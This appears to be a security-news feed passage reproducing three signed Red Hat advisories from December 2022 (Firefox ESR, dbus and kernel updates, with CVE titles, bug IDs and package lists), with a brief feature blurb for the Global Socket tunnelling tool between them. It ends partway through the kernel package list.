Red Hat Security Advisory 2022-8979-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.5.0 ESR. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:8979-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8979  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405  
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409  
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412  
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420  
                   CVE-2022-45421  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.5.0 ESR.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
firefox-102.5.0-1.el9_0.src.rpm

aarch64:  
firefox-102.5.0-1.el9_0.aarch64.rpm  
firefox-debuginfo-102.5.0-1.el9_0.aarch64.rpm  
firefox-debugsource-102.5.0-1.el9_0.aarch64.rpm

ppc64le:  
firefox-102.5.0-1.el9_0.ppc64le.rpm  
firefox-debuginfo-102.5.0-1.el9_0.ppc64le.rpm  
firefox-debugsource-102.5.0-1.el9_0.ppc64le.rpm

s390x:  
firefox-102.5.0-1.el9_0.s390x.rpm  
firefox-debuginfo-102.5.0-1.el9_0.s390x.rpm  
firefox-debugsource-102.5.0-1.el9_0.s390x.rpm

x86_64:  
firefox-102.5.0-1.el9_0.x86_64.rpm  
firefox-debuginfo-102.5.0-1.el9_0.x86_64.rpm  
firefox-debugsource-102.5.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j+A9zjgjWX9erEAQh9Cg/+JCBvqfukZeQuNyfQsIs1twQCwFu0x/lW  
eo7Pwwwqxu//Yib7kRgVOE9HDZ8t5xN9Z2G9/3NzW+k2t/cfbLi0qcm1nDFGwAc8  
HT5BfxNRwILBEwdOCrVF6Q2Y5o+5kSTGQxVsCRhJT7EzE9kGNetTXSNoNNxde+on  
3o9ZigBwEyNe4aLK1Kjha7O6OcWz+q2hwU5yHwr4SpunopsBsdqJRVGW5z0wUFD2  
BkN2LC7iSW5bAVTnTR4DU07BMz9nMjYweLOP1odb6+ZXbQ5GABtzzEpI3Y+lkReZ  
p4Pi79C5Co+/2RY8aIGA/GvC+mkC4hlg7WC1DU9H/HjLIPtC0CV/akIu+m/pXB4r  
ai9I5JECF5HizcAdXwoGWJdit9tLEkg+OpmxM+4hbMnQwM6Uf0G3pNqgVHVU7+fJ  
biz5Z7mBmZsTABrIMeeDxX/Fm/m+XeiQ/LafnR3on2bg6v4m16oUyCuOIqumiB/W  
8kO5Y8YDigyGkcW+rpvsLf0RPsz0P1ITOd54Uj6g5xM+VuoInVFsHHSXAyKpyJY1  
4jt6aoCVPyPd1UbSmHDNwwMEm9Pf8BnqKevB+sK6drzD9Z9JKmV+mE4Gr5SugNNz  
6GLhnHF3qJPVrKFKSuVvP4/jhiD1b0n6xBLelBcbMz/c5RE6qoNCEU2HgIIcRynr  
hGr7BYgvQEA=Fidz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8979-01

Global Socket is a tool for moving data from here to there, securely, fast, and through NAT and firewalls. It uses the Global Socket Relay Network to connect TCP pipes, has end-to-end encryption (using OpenSSL's SRP / RFC-5054), AES-256 and key exchange using 4096-bit Prime, requires no PKI, has Perfect Forward Secrecy, and TOR support.

Global Socket 1.4.39

Red Hat Security Advisory 2022-8977-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: dbus security update  
Advisory ID:       RHSA-2022:8977-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8977  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-42010 CVE-2022-42011 CVE-2022-42012  
====================================================================  
1. Summary:

An update for dbus is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

D-Bus is a system for sending messages between applications. It is used  
both for the system-wide message bus service, and as a  
per-user-login-session messaging facility.

Security Fix(es):

* dbus: dbus-daemon crashes when receiving message with incorrectly nested  
parentheses and curly brackets (CVE-2022-42010)

* dbus: dbus-daemon can be crashed by messages with array length  
inconsistent with element type (CVE-2022-42011)

* dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with  
"foreign" endianness correctly (CVE-2022-42012)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all running instances of dbus-daemon and all  
running applications using the libdbus library must be restarted, or the  
system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2133616 - CVE-2022-42010 dbus: dbus-daemon crashes when receiving message with incorrectly nested parentheses and curly brackets  
2133617 - CVE-2022-42011 dbus: dbus-daemon can be crashed by messages with array length inconsistent with element type  
2133618 - CVE-2022-42012 dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with "foreign" endianness correctly

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

aarch64:  
dbus-daemon-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-devel-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-x11-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm

ppc64le:  
dbus-daemon-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-devel-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-x11-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm

s390x:  
dbus-daemon-1.12.20-5.el9_0.1.s390x.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.s390x.rpm  
dbus-devel-1.12.20-5.el9_0.1.s390x.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-x11-1.12.20-5.el9_0.1.s390x.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.s390x.rpm

x86_64:  
dbus-daemon-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.i686.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-devel-1.12.20-5.el9_0.1.i686.rpm  
dbus-devel-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-x11-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
dbus-1.12.20-5.el9_0.1.src.rpm

aarch64:  
dbus-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-libs-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-tools-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm

noarch:  
dbus-common-1.12.20-5.el9_0.1.noarch.rpm

ppc64le:  
dbus-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-libs-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-tools-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm

s390x:  
dbus-1.12.20-5.el9_0.1.s390x.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.s390x.rpm  
dbus-libs-1.12.20-5.el9_0.1.s390x.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-tools-1.12.20-5.el9_0.1.s390x.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.s390x.rpm

x86_64:  
dbus-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.i686.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-libs-1.12.20-5.el9_0.1.i686.rpm  
dbus-libs-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-tools-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42010  
https://access.redhat.com/security/cve/CVE-2022-42011  
https://access.redhat.com/security/cve/CVE-2022-42012  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j9/9zjgjWX9erEAQj45g//WjO+V9yYyQWGruAmG4AUX54olkvOyC0V  
Ag4hLPeQ0h3wPdcv07ucqxY37DrzrqxXI0hbXZkrnxoN2T0rJjo8GAdPrrrOIqpV  
zZ6iqkEf+aLU5oNOrw0NAPe5oazaevy+auYsER8SeTcZb4kUbb/sNPOjI3o2QvNn  
DhudaPFsZ/hwqMTBasgqPwun4SUXHq4rv/Vh6lzS7xzRD9DRlFjSmkjcTbM+SGPO  
UNj+wRXPyaa0lQ04aRAnEPm4MlbHFe8YDy7L/KkpFeIfYxk3AloomxP/uffSQWsR  
MOywYYCwCKJ5I5qKIuW0/DlnobfOSC3J2B5tqaaCVHXy9D0NL4BiELOqVqzEjbc0  
byqF2akJgmZYOWFvbD3DYlkVkDh8utXpO9Da9JIBc8IkgkiQFicA6Xwk6qH4QYY3  
Xx2M/L/aKLmCOleL99OZ5zDMRVg2wf3kpf3e8aHQkdlf6d6XF5vELk+XH0W+N17C  
0SBL0FCQsw98WNAoY643NaR7or5bsBxhs1rjAKK0Kj/GDnyxLUTKYHB5V0O4AOEu  
Wp3/6+YubTYqvTfoGY9Zazt18naQz+uCcxnlH+/0n5CXfDmFvQc0hlJwrMSzZdaD  
4WZn8TJ6xQ9tCFb8uv1/GphEr1praGOvSd71e78hOh0vB9OLaLCrKdlBXM8lyInz  
ztf9Jrw2DnY=wGFs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8977-01

Red Hat Security Advisory 2022-8973-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include buffer overflow, code execution, memory leak, out of bounds write, and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2022:8973-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8973  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-1158 CVE-2022-2639 CVE-2022-2959   
                   CVE-2022-21123 CVE-2022-21125 CVE-2022-21166   
                   CVE-2022-23816 CVE-2022-23825 CVE-2022-26373   
                   CVE-2022-29900 CVE-2022-29901 CVE-2022-43945   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

* kernel: watch queue race condition can lead to privilege escalation  
(CVE-2022-2959)

* kernel: nfsd buffer overflow by RPC message over TCP with garbage data  
(CVE-2022-43945)

* hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
(CVE-2022-21123)

* hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka  
SBDS) (CVE-2022-21125)

* hw: cpu: incomplete clean-up in specific special register write  
operations (aka DRPW) (CVE-2022-21166)

* hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-23816, CVE-2022-29900)

* hw: cpu: AMD: Branch Type Confusion (non-retbleed) (CVE-2022-23825)

* hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
(CVE-2022-26373)

* hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-29901)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* sched/pelt: Fix attach_entity_load_avg() corner case (BZ#2105360)

* RHEL9[fleetwood][P9]:kdump fails to capture vmcore when crash is  
triggered while running forkoff. (BZ#2109144)

* ISST-LTE:[P10 Everest] [5.14.0-70.9.1.el9_0.ppc64le] HPT:RHEL9.0:ecolp95:  
lpar crashed at __list_del_entry_valid+0x90/0x100 and LPM failed  
(BZ#2112823)

* [rhel9] livepatch panic: RIP: 0010:0xffffffffc0e070c4  
seq_read_iter+0x124/0x4b0 (BZ#2122625)

* System crashes due to list_add double add at  
iwl_mvm_mac_wake_tx_queue+0x71 (BZ#2123315)

* [Dell EMC 9.0 BUG] Any process performing I/O doesn't fail on degraded  
LVM RAID and IO process hangs (BZ#2126215)

* [HPEMC RHEL 9.0 REGRESSION] net, e810, ice: not enough device MSI-X  
vectors (BZ#2126491)

* RHEL9.0 - zfcp: fix missing auto port scan and thus missing target ports  
(BZ#2127874)

* Enable check-kabi (BZ#2132372)

* Add symbols to stablelist (BZ#2132373)

* Update RHEL9.1 kabi tooling (BZ#2132380)

* kABI: Prepare the MM subsystem for kABI lockdown (BZ#2133464)

* [Dell Storage 9.1 BUG] NVME command hang during storage array node reboot  
(BZ#2133553)

* WARNING: CPU: 116 PID: 3440 at arch/x86/mm/extable.c:105  
ex_handler_fprestore+0x3f/0x50 (BZ#2134589)

* crypto/testmgr.c should not list dh, ecdh-nist-p256, ecdh-nist-p384 as  
.fips_allowed = 1 (BZ#2136523)

* FIPS self-tests for RSA pkcs7 signature verification (BZ#2136552)

* [ovs-tc] Bad length in dpctl/dump-flows (BZ#2137354)

* [RHEL9] s_pf0vf2: hw csum failure for mlx5 (BZ#2137355)

* kernel memory leak while freeing nested actions (BZ#2137356)

* ovs: backports from upstream (BZ#2137358)

* kernel should conform to FIPS-140-3 requirements (both parts)  
(BZ#2139095)

* [DELL EMC 9.0-RT BUG] System is not booting into RT Kernel with perc12.  
(BZ#2139214)

* Fix panic in nbd/004 test (BZ#2139535)

* Nested KVM is not working on RHEL 8.6 with hardware error 0x7  
(BZ#2140141)

* [RHEL9] Practically limit "Dummy wait" workaround to old Intel systems  
(BZ#2142169)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()  
2090226 - CVE-2022-23816 CVE-2022-29900 hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2090237 - CVE-2022-21123 hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
2090240 - CVE-2022-21125 hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka SBDS)  
2090241 - CVE-2022-21166 hw: cpu: incomplete clean-up in specific special register write operations (aka DRPW)  
2103148 - CVE-2022-29901 hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2103153 - CVE-2022-23825 hw: cpu: AMD: Branch Type Confusion (non-retbleed)  
2103681 - CVE-2022-2959 kernel: watch queue race condition can lead to privilege escalation  
2115065 - CVE-2022-26373 hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
2141752 - CVE-2022-43945 kernel: nfsd buffer overflow by RPC message over TCP with garbage data

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

aarch64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm

noarch:  
kernel-doc-5.14.0-70.36.1.el9_0.noarch.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-matched-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
kernel-5.14.0-70.36.1.el9_0.src.rpm

aarch64:  
bpftool-5.14.0-70.36.1.el9_0.aarch64.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
